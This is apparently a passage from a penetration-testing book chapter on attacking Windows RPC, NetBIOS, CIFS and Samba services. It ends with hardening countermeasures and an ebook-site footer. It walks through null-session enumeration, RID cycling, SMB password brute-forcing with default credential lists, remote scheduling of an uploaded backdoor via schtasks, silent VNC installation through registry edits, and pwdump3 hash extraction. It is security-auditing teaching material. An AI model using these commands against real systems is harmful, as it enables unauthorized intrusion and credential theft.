ootcimv2:
Win32_UserAccount.Name="Guest",Domain="OFFICE";
\WEBSERV
ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV
ootcimv2:
Win32_UserAccount.Name="__vmware_user__",Domain="OFFICE";

Executing Arbitrary Commands

After compromising a valid password of a user in the Administrators group, you can execute commands through the Task Scheduler interface. To do so, Urity developed a Windows utility called Remoxec; it’s available from http://www.securityfriday.com and the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/remoxec101.zip. Figure 10-2 shows the tool in use; it requires the target IP address and valid credentials.

Remoxec is used to run commands remotely
Figure 10-2. Remoxec is used to run commands remotely

The NetBIOS Name Service

The NetBIOS name service is accessible through UDP port 137. The service processes NetBIOS Name Table (NBT) requests in environments where Windows is being used along with workgroups, domains, or Active Directory components.

Enumerating System Details

You can easily enumerate the following system details by querying the name service:

  • NetBIOS hostname

  • The domain of which the system is a member

  • Authenticated users currently using the system

  • Accessible network interface MAC addresses

The inbuilt Windows nbtstat command can enumerate these details remotely. Example Example 10-13 shows how it can be run against 192.168.189.1.

Example 10-13. Using nbtstat to dump the NetBIOS name table
C:> nbtstat -A 192.168.189.1

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WEBSERV        <00>  UNIQUE      Registered
    WEBSERV        <20>  UNIQUE      Registered
    OSG-WHQ        <00>  GROUP       Registered
    OSG-WHQ        <1E>  GROUP       Registered
    OSG-WHQ        <1D>  UNIQUE      Registered
    __MSBROWSE__   <01>  GROUP       Registered
    WEBSERV        <03>  UNIQUE      Registered
    __VMWARE_USER__<03>  UNIQUE      Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered

    MAC Address = 00-50-56-C0-A2-09

The information shown in Example 10-13 shows that the hostname is WEBSERV, the domain is OSG-WHQ, and two current users are __vmware_user__ and administrator. Table 10-5 lists common NetBIOS name codes and descriptions.

Table 10-5. Common NetBIOS Name Table names and descriptions

NetBIOS code

Type

Information obtained

<00>

UNIQUE

Hostname

<00>

GROUP

Domain name

<host name><03>

UNIQUE

Messenger service running for that computer

<user name><03>

UNIQUE

Messenger service running for that individual logged-in user

<20>

UNIQUE

Server service running

<1D>

GROUP

Master browser name for the subnet

<1B>

UNIQUE

Domain master browser name, identifies the PDC for that domain

Attacking the NetBIOS Name Service

The NetBIOS name service is vulnerable to a number of attacks if UDP port 137 is accessible from the Internet or an untrusted network. MITRE CVE lists these issues, shown in Table 10-6.

Table 10-6. NetBIOS name service vulnerabilities

CVE name

Date

Notes

CVE-2003-0661

03/09/2003

NBNS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which can allow remote attackers to obtain sensitive information.

CVE-2000-0673

27/07/2000

NBNS doesn’t perform authentication, which allows remote attackers to cause a denial-of-service by sending a spoofed Name Conflict or Name Release datagram.

CVE-1999-0288

25/09/1999

Malformed NBNS traffic results in WINS crash.

The NetBIOS Datagram Service

The NetBIOS datagram service is accessible through UDP port 138. As the NetBIOS name service is vulnerable to various naming attacks (resulting in denial-of-service in some cases), so can the NetBIOS datagram service be used to manipulate the target host and its NetBIOS services.

Anthony Osborne of PGP COVERT Labs published an advisory in August 2000 that documented a NetBIOS name cache corruption attack that can be launched by sending crafted UDP datagrams to port 138. The full advisory is available at http://www.securityfocus.com/advisories/2556.

RFC 1002 defines the way in which Windows NetBIOS host information is encapsulated within the NetBIOS datagram header. When a browse frame request is received (on UDP port 138), Windows extracts the information from the datagram header and stores it in the NetBIOS name cache. In particular, the source NetBIOS name and IP address are blindly extracted from the datagram header and inserted into the cache.

A useful scenario in which to undertake this attack would be to send the target host a crafted NetBIOS datagram that mapped a known NetBIOS name on the internal network (such as a domain controller) to your IP address. When the target host attempted to connect to the server by its NetBIOS name, it would instead connect to your IP address. An attacker can use Cain & Abel (http://www.oxid.it) to capture rogue SMB password hashes in this scenario (which he can then crack and use to access other hosts).

Interestingly, Microsoft didn’t release a patch for this issue: due to the unauthenticated nature of NetBIOS naming, it’s a fundamental vulnerability! The MITRE CVE contains good background information within CVE-2000-1079.

The NetBIOS Session Service

The NetBIOS session service is accessible through TCP port 139. In particular, the service facilitates authentication across a Windows workgroup or domain and provides access to resources (such as files and printers). You can perform the following attacks against the NetBIOS session service:

  • Enumerate details of users, shared folders, security policies, and domain information

  • Brute-force user passwords

After authenticating with the NetBIOS session service as a privileged user, you can:

  • Upload and download files and programs

  • Schedule and run arbitrary commands on the target host

  • Access the registry and modify keys

  • Access the SAM password database for cracking

Tip

The CESG CHECK guidelines specify that candidates should be able to enumerate system details through NetBIOS (including users, groups, shares, domains, domain controllers, and password policies), including user enumeration through RID cycling. After enumerating system information, candidates are required to brute-force valid user passwords and access the filesystem and registry of the remote host upon authenticating.

Enumerating System Details

Various tools can enumerate sensitive information from a target Windows host with TCP port 139 open. Information can be collected either anonymously by initiating what is known as a null session, or through knowledge of a valid username and password. A null session is when you authenticate with the IPC$ share of the target host in the following manner:

          net use \targetIPC$ "" /user: ""

By specifying a null username and password, you gain anonymous access to IPC$. By default, Windows hosts allow anonymous access to system and network information through NetBIOS, so the following can be gleaned:

  • User list

  • Machine list

  • NetBIOS name list

  • Share list

  • Password policy information

  • Group and member list

  • Local Security Authority (LSA) policy information

  • Trust information between domains and hosts

Here are three Windows command-line tools that are commonly used to enumerate this information:

enum (http://razor.bindview.com/tools/files/enum.tar.gz)
winfo (http://www.ntsecurity.nu/toolbox/winfo/)
GetAcct (http://www.securityfriday.com)

Many other tools can perform enumeration through null sessions; however, I find that these three utilities give excellent results in terms of user, system, and policy details.

enum

Jordan Ritter’s enum utility is a Windows command-line tool that can extensively query the NetBIOS session service. The tool can list usernames, password policy, shares, and details of other hosts including domain controllers. Example 10-14 shows the enum usage information.

Example 10-14. Enum usage and command-line options
D:enum> enum
usage:  enum  [switches]  [hostname|ip]
  -U:  get userlist
  -M:  get machine list
  -N:  get namelist dump (different from -U|-M)
  -S:  get sharelist
  -P:  get password policy information
  -G:  get group and member list
  -L:  get LSA policy information
  -D:  dictionary crack, needs -u and -f
  -d:  be detailed, applies to -U and -S
  -c:  don't cancel sessions
  -u:  specify username to use (default "")
  -p:  specify password to use (default "")
  -f:  specify dictfile to use (wants -D)

By default, the tool attempts to use an anonymous null session to enumerate system information. You can, however, specify a username and password from the command line or even use the -D flag along with -u and -f <filename> options to perform brute-force grinding of a valid user password against the NetBIOS session service.

Any combination of the query flags can be used within a single command. Example 10-15 shows enum being used to enumerate user, group details, and password policy information.

Example 10-15. Using enum to find system details
D:enum> enum -UGP 192.168.189.1
server: 192.168.189.1
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
getting user list (pass 1, index 0)... success, got 5.
  __vmware_user__  Administrator  Guest  Mickey  VUSR_OSG-SERV
Group: Administrators
OSG-SERVAdministrator
Group: Backup Operators
Group: Guests
OSG-SERVGuest
Group: Power Users
OSG-SERVMickey
Group: Replicator
Group: Users
NT AUTHORITYINTERACTIVE
NT AUTHORITYAuthenticated Users
Group: __vmware__
OSG-SERV\__vmware_user__
cleaning up... success.

These details show that the out-of-box default Windows 2000 password policy is in place (no minimum password length or account lockout threshold). Along with the standard Administrator, Guest, and other system accounts, the user Mickey is also present.

winfo

The winfo utility gives a good overview of the target Windows host through a null session. It collects information that enum doesn’t, including domain trust details and currently logged-in users. Example 10-16 demonstrates winfo in use.

Example 10-16. Using winfo to enumerate system information
D:> winfo 192.168.189.1
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
          - http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:
 - OS version: 5.0

DOMAIN INFORMATION:
 - Primary domain (legacy): OSG-WHQ
 - Account domain: OSG-SERV
 - Primary domain: OSG-WHQ
 - DNS name for primary domain:
 - Forest DNS name for primary domain:

PASSWORD POLICY:
 - Time between end of logon time and forced logoff: No forced logoff
 - Maximum password age: 42 days
 - Minimum password age: 0 days
 - Password history length: 0 passwords
 - Minimum password length: 0 characters

LOCOUT POLICY:
 - Lockout duration: 30 minutes
 - Reset lockout counter after 30 minutes
 - Lockout threshold: 0

SESSIONS:
 - Computer: OSG-SERV
 - User: ADMINISTRATOR

LOGGED IN USERS:

 * __vmware_user__
 * Administrator

USER ACCOUNTS:

 * Administrator
   (This account is the built-in administrator account)
 * Guest
   (This account is the built-in guest account)
 * mickey
 * VUSR_OSG-SERV
 * __vmware_user__

WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:

SHARES:

 * IPC$
    - Type: Unknown
    - Remark: Remote IPC
 * D$
    - Type: Special share reserved for IPC or administrative share
    - Remark: Default share
 * ADMIN$
    - Type: Special share reserved for IPC or administrative share
    - Remark: Remote Admin
 * C$
    - Type: Special share reserved for IPC or administrative share
    - Remark: Default share

By default, Windows systems share all drive letters in use, such as C$ and D$ in the examples here. These shares can be accessed remotely upon authenticating, allowing you to upload and download data. The other shares shown here (IPC$ and ADMIN$) are for administrative purposes, such as installing software and managing processes running on the host remotely.

GetAcct

GetAcct is a useful tool that allows you to perform reverse-lookups for Windows server RID values to get user account names (also known as RID cycling). Standard enumeration tools such as enum and winfo simply use forward-lookup techniques to dump the user list, which administrators can protect against by setting RestrictAnonymous=1 within the system registry (discussed later under the "Windows Networking Services Countermeasures" section).

Windows NT 4.0 hosts can only set RestrictAnonymous=1, and are thus susceptible to RID cycling. Windows 2000 hosts have extended anonymous access protection which can be set with RestrictAnonymous=2, preventing RID cycling from being effective. Figure 10-3 shows GetAcct in action against a Windows 2000 host at 192.168.189.1.

GetAcct performs RID cycling to enumerate users
Figure 10-3. GetAcct performs RID cycling to enumerate users

Brute-Forcing User Passwords

The SMBCrack and SMB-AT tools can brute-force user passwords through the NetBIOS session service; they are available from the following sites:

http://www.netxeyes.org/smbcrack.exe
http://www.cqure.net/tools/smbat-win32bin-1.0.4.zip
http://www.cqure.net/tools/smbat-src-1.0.5.tar.gz

Table 10-7 shows a short list of common Windows login and password combinations. Backup and management software including ARCserve and Tivoli require dedicated user accounts on the server or local machine to function, and are often set with weak passwords.

Table 10-7. High-probability user login and password combinations

User login name

Password

Administrator

(blank)

arcserve

arcserve, backup

tivoli

tivoli

backupexec

backupexec, backup

test

test

Warning

Before launching a brute-force password-grinding exercise, it is sensible to enumerate the account lockout policy for the system you are going to attack, as shown in Example 10-15 and Example 10-16. If you launch a brute-force attack against a domain controller that is set to lock accounts after a specified number of unsuccessful login attempts, you can easily lock out the entire domain.

Authenticating with NetBIOS

Upon cracking a valid user account password, you can authenticate with NetBIOS by using the net command from a Windows platform or a tool such as smbclient in Unix-like environments with Samba (http://www.samba.org) installed. The net command usage is as follows:

          net use \targetIPC$ password /user:username

You can also use the net utility to authenticate with ADMIN$ or administrative drive shares (C$, D$, etc.). After successfully authenticating, you can try to execute commands server-side, upload and download files, and modify registry keys.

Executing Commands

You can execute local commands through SMB via the Service Control Manager (SCM) or Task Scheduler. To execute commands though the Task Scheduler, we use the Windows schtasks command upon authenticating with a NetBIOS session or CIFS service with the ADMIN$ share. The schtasks command schedules programs to run at a designated time through the Task Scheduler service. Example 10-17 shows how I authenticate against 192.168.189.1 (with the username Administrator and password secret), and then schedule c: empo2k.exe (a known backdoor that I have uploaded) to run at 10:30.

Example 10-17. Scheduling a task on a remote host using schtasks
C:> schtasks /create /s 192.168.189.1 /u WEBSERVAdministrator /p secret /sc ONCE
    /st 10:30:00 /tr c:	empo2k.exe /tn BackupExec

schtasks has a lot of options and flags that can be set and used. Please review Microsoft KB article 814596 (http://support.microsoft.com/kb/814596) for further details and use cases. We can review pending jobs on 192.168.189.1 in the following way:

C:> schtasks /query /s 192.168.189.1

TaskName                             Next Run Time            Status
==================================== ======================== ===============
BackupExec                           10:30:00, 08/07/2007

To execute commands directly through the SCM (as opposed to the Task Scheduler), we can use PsExec (part of the Sysinternals PsTools package, available from http://download.sysinternals.com/files/pstools.zip). PsExec usage is discussed in http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx.

Accessing and Modifying Registry Keys

You can use three tools from the Microsoft Windows NT Resource Kit to access and manipulate system registry keys on a given host:

regdmp.exe

Accesses and dumps the system registry remotely

regini.exe

Used to set and modify registry keys remotely

reg.exe

Used with the delete option to remove registry keys

After authenticating with the NetBIOS session service, regdmp is used to dump the contents of the registry. regdmp has the following usage:

REGDMP [-m \machinename | -h hivefile hiveroot | -w Win95 Directory]
       [-i n] [-o outputWidth]
       [-s] [-o outputWidth] registryPath

Example 10-18 shows regdmp in use against 192.168.189.1 to dump the contents of the entire system registry.

Example 10-18. Using regdmp to enumerate the system registry
C:> regdmp -m \192.168.189.1
Registry
  Machine [17 1 8]
   HARDWARE [17 1 8]
    ACPI [17 1 8]
     DSDT [17 1 8]
      GBT__  _ [17 1 8]
       AWRDACPI [17 1 8]
        00001000 [17 1 8]
         00000000 = REG_BINARY 0x00003bb3 0x54445344 
                    0x00003bb3 0x42470101 0x20202054 
                    0x44525741 0x49504341 0x00001000 
                    0x5446534d 0x0100000c 0x5f5c1910 
                    0x5b5f5250 0x2e5c1183 0x5f52505f 
                    0x30555043 0x00401000 0x5c080600 
                    0x5f30535f 0x0a040a12 0x0a000a00 
                    0x08000a00 0x31535f5c 0x040a125f

You can add or modify registry keys using the regini command along with crafted text files containing the new keys and values. To silently install a VNC server on a target host, you first have to set two registry keys to define which port the service listens on and the VNC password for authentication purposes. A text file (winvnc.ini in this case) is assembled first:

HKEY_USERS.DEFAULTSoftwareORLWinVNC3
    SocketConnect = REG_DWORD 0X00000001
    Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e

After listing the keys you wish to add to the registry, use the regini command to insert them:

C:> regini -m \192.168.189.1 winvnc.ini

Removing registry keys from the remote system is easily achieved using the reg command (found within Windows NT family systems) with the correct delete option. To remove the VNC keys just set, use the following command:

C:> reg delete \192.168.189.1HKU.DEFAULTSoftwareORLWinVNC3

Accessing the SAM Database

Through compromising the password of a user in the Administrators group, the SAM encrypted password hashes can be dumped directly from memory of the remote host, thus bypassing SYSKEY encryption protecting the hashes stored within the SAM database file. A Windows utility known as pwdump3 can achieve this by authenticating first with the ADMIN$ share and then extracting the encrypted user password hashes. pwdump3 is available from http://packetstormsecurity.org/crackers/nt/pwdump3.zip.

Example 10-19 shows pwdump3 dumping the encrypted user password hashes from the Windows 2000 host at 192.168.189.1 to hashes.txt using the Administrator account (although any user account in the Administrators group can be used).

Example 10-19. Using pwdump3 to remotely extract password hashes
D:pwdump> pwdump3 192.168.189.1 hashes.txt Administrator

pwdump3 by Phil Staubs, e-business technology
Copyright 2001 e-business technology, Inc.

This program is free software based on pwpump2 by Tony Sabin
under the GNU General Public License Version 2 (GNU GPL), you
can redistribute it and/or modify it under the terms of the
GNU GPL, as published by the Free Software Foundation. NO
WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM.
Please see the COPYING file included with this program (also
available at www.ebiz-tech.com/pwdump3) and the GNU GPL for
further details.

Please enter the password >secret
Completed.

Two tools that can be used to crack Windows password hashes downloaded in this way are as follows:

Cain & Abel (http://www.oxid.it)
John the Ripper (http://www.openwall.com/john)

Cain & Abel is more advanced, supporting rainbow table cracking of NTLM hashes, whereas John the Ripper is used to perform basic (and quick) dictionary-based attacks. Rainbow cracking of stored authentication hashes involves a time-memory trade-off, where hashes are precomputed and stored in a rainbow table, which is then cross-referenced with the hashes to reveal the passwords.

Three toolkits used to generate rainbow tables that can be used from Cain & Abel to attack many types of encrypted password hash are as follows:

Winrtgen (http://www.oxid.it/downloads/winrtgen.zip)
Ophcrack (http://ophcrack.sourceforge.net)
RainbowCrack (http://www.antsight.com/zsl/rainbowcrack)

The CIFS Service

The CIFS service is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility.

Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands).

CIFS Enumeration

In the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job.

The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Windows executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net.

User enumeration through smbdumpusers

The smbdumpusers utility is a highly versatile Windows NT user enumeration tool that can query SMB through both NetBIOS session (TCP 139) and CIFS (TCP 445) services. A second useful feature is the way the utility can enumerate users through a direct dump that works with RestrictAnonymous=0, but also using the RID cycling technique that can evade RestrictAnonymous=1 settings by attempting to reverse each ID value to a username. Example 10-20 shows the usage and command-line options for smbdumpusers.

Example 10-20. smbdumpusers usage and command-line options
D:smb-at> smbdumpusers

 SMB - DumpUsers V1.0.4 by ([email protected])
 -------------------------------------------------------------------
 usage: smbdumpusers -i <ipaddress|ipfile> [options]

         -i*     IP or <filename> of server[s] to bruteforce
         -m      Specify which mode
                     1 Dumpusers (Works with restrictanonymous=0)
                     2 SidToUser (Works with restrictanonymous=0|1)
         -f      Filter output
                     0 Default (Filter Machine Accounts)
                     1 Show All
         -e      Amount of sids to enumerate
         -E      Amount of sid mismatches before aborting mode 2
         -n      Start at SID
         -s      Name of the server to bruteforce
         -r      Report to <ip>.txt
         -t      timeout for connect (default 300ms)
         -v      Be verbose
         -P      Protocol version
                     0 - Netbios Mode
                     1 - Windows 2000 Native Mode

Example 10-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 10-3) through CIFS.

Example 10-21. Cycling RID values to find usernames with smbdumpusers
D:smb-at> smbdumpusers -i 192.168.189.1 -m 2 -P1
500-Administrator
501-Guest
513-None
1000-__vmware__
1001-__vmware_user__
1002-VUSR_OSG-SERV
1003-mickey

CIFS Brute Force

The SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 10-22 shows the smbbf usage.

Example 10-22. smbbf usage and command-line options
D:smb-at> smbbf

 SMB - Bruteforcer V1.0.4 by ([email protected])
 --------------------------------------------------------------
 usage: smbbf -i [options]

         -i*     IP address of server to bruteforce
         -p      Path to file containing passwords
         -u      Path to file containing users
         -s      Server to bruteforce
         -r      Path to report file
         -t      timeout for connect (default 300ms)
         -w      Workgroup/Domain
         -g      Be nice, automatically detect account lockouts
         -v      Be verbose
         -P      Protocol version
                     0 - Netbios Mode
                     1 - Windows 2000 Native Mode

To run smbbf against the CIFS service at 192.168.189.1, using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 10-23.

Example 10-23. Using smbbf against the CIFS service
D:smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1
INFO: Could not determine server name ...

-- Starting password analysis on 192.168.189.1 --

Logging in as Administrator  with secret on WIDGETS
Access denied
Logging in as Administrator  with qwerty on WIDGETS
Access denied
Logging in as Administrator  with letmein on WIDGETS
Access denied
Logging in as Administrator  with password on WIDGETS
Access denied
Logging in as Administrator  with abc123 on WIDGETS
Access denied

The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second.

If smbbf is run with only an IP address specified, it does the following:

  • Retrieves a list of valid usernames through a null session

  • Attempts to log in to each account with a blank password

  • Attempts to log in to each account with the username as password

  • Attempts to log in to each account with the password of “password”

The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next.

Unix Samba Vulnerabilities

The Samba open source suite (http://www.samba.org) allows Linux and other Unix-like platforms to operate more easily within Windows NT domains and provides seamless file and print services to SMB and CIFS clients. A number of remote vulnerabilities have been found in Samba services, allowing attackers to execute arbitrary code and commands and bypass security restrictions.

At the time of this writing, the MITRE CVE list contains a number of serious remotely exploitable issues in Samba (not including DoS issues), as shown in Table 10-8.

Table 10-8. Remotely exploitable Samba vulnerabilities

CVE reference(s)

Date

Notes

CVE-2007-2446 and CVE-2007-2447

15/05/2007

Multiple Samba 3.0.25rc3 MSRPC component vulnerabilities

CVE-2007-0453

05/02/2007

nss_winbind.so.1 (as used by Samba 3.0.23d on Solaris) arbitrary code execution via DNS functions

CVE-2004-1154

16/12/2004

Samba 3.0.9 MSRPC heap overflow

CVE-2004-0882

15/10/2004

Samba 3.0.7 QFILEPATHINFO request handler overflow

CVE-2004-0815

30/09/2004

Samba 3.0.2a malformed pathname security restriction bypass

CVE-2003-1332

27/07/2003

Samba 2.2.7 reply_nttrans( ) overflow

CVE-2003-0201

07/04/2003

Samba 2.2.7 call_trans2open( ) overflow

CVE-2003-0085

14/03/2003

Samba 2.2.7 remote packet fragment overflow

CVE-2002-1318

20/11/2002

Samba 2.2.6 password change request overflow

CVE-2002-2196

28/08/2002

Samba 2.2.4 and prior enum_csc_policy( ) overflow

CVE-2001-1162

24/06/2001

Samba 2.0.8 and prior remote file creation vulnerability

MSF supports CVE-2003-0201 and CVE-2007-2446. Immunity CANVAS supports CVE-2003-0201 and CVE-2003-0085, and CORE IMPACT supports CVE-2003-0201, CVE-2003-0085, CVE-2007-2446, and CVE-2007-2447 at this time. Milw0rm (http://www.milw0rm.com) has a number of useful Samba exploits, including exploits for the Samba SWAT web server.

Depending on the open network ports of a given Unix-like host running Samba, you will be presented with a number of avenues to perform enumeration and brute-force password-grinding attacks. In particular, refer to the earlier examples of attacks launched against MSRPC, NetBIOS session, and CIFS services because the same tools will be equally effective against accessible Samba services running on ports 135, 139, and 445, respectively.

Windows Networking Services Countermeasures

The following countermeasures should be considered when hardening Windows services:

  • Filter public or untrusted network access to high-risk services, especially the RPC endpoint mapper (TCP and UDP port 135), and the NetBIOS session and CIFS services (TCP ports 139 and 445), which can be attacked and used to compromise Windows environments. Do not forget to filter RPC service endpoints, accessible on TCP and UDP ports above 1025.

  • Ensure local administrator account passwords are set because these are often set to NULL on workstations when domain authentication is used. If possible, disable the local computer Administrator accounts across your network.

  • Enforce a decent user account lockout policy to minimize the impact of brute-force password-grinding attacks.

Microsoft RPC service-specific countermeasures:

  • If RPC services are accessible from the Internet, ensure that the latest Microsoft security patches relating to RPC components are always installed and maintained to a good degree.

  • Disable the Task Scheduler and Messenger services if they aren’t required. The Task Scheduler can be used by attackers to remotely execute commands, and both services have known memory management issues.

  • In high-security environments, you can consider disabling DCOM completely, although it will break a lot of functionality. Microsoft KB article 825750 discusses this; you can find it at http://support.microsoft.com/default.aspx?kbid=825750.

  • Be aware of threats presented by RPC over HTTP functionality within Microsoft IIS web services (when COM Internet Services is installed). Ensure that the RPC_CONNECT HTTP method isn’t allowed (unless required) through any publicly accessible web services in your environment.

NetBIOS session and CIFS service-specific countermeasures:

  • Enforce RestrictAnonymous=2 under Windows 2000, XP, and 2003 hosts to prevent enumeration of system information through NetBIOS. The registry key can be found under HKLMSYSTEMCurrentControlSetControlLsa. Microsoft KB articles 246261 and 296405 discuss the setting in detail, available from http://support.microsoft.com.

  • Enforce NTLMv2 if possible. Fast, multithreaded brute-force tools, such as SMBCrack, take advantage of weaknesses within standard NTLM, and therefore don’t work against the cryptographically stronger NTLMv2.

  • Rename the Administrator account to a nonobvious name (e.g., not admin or root), and set up a decoy Administrator account with no privileges.

  • The Microsoft Windows 2000 Resource Kit contains a tool called passprop.exe that can lock the administrator account and prevent it from being used across the network (thus negating brute-force and other attacks), but still allows administrator logons locally at the system console. To lock the Administrator account in this way, issue a passprop /adminlockout command.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.119.113.199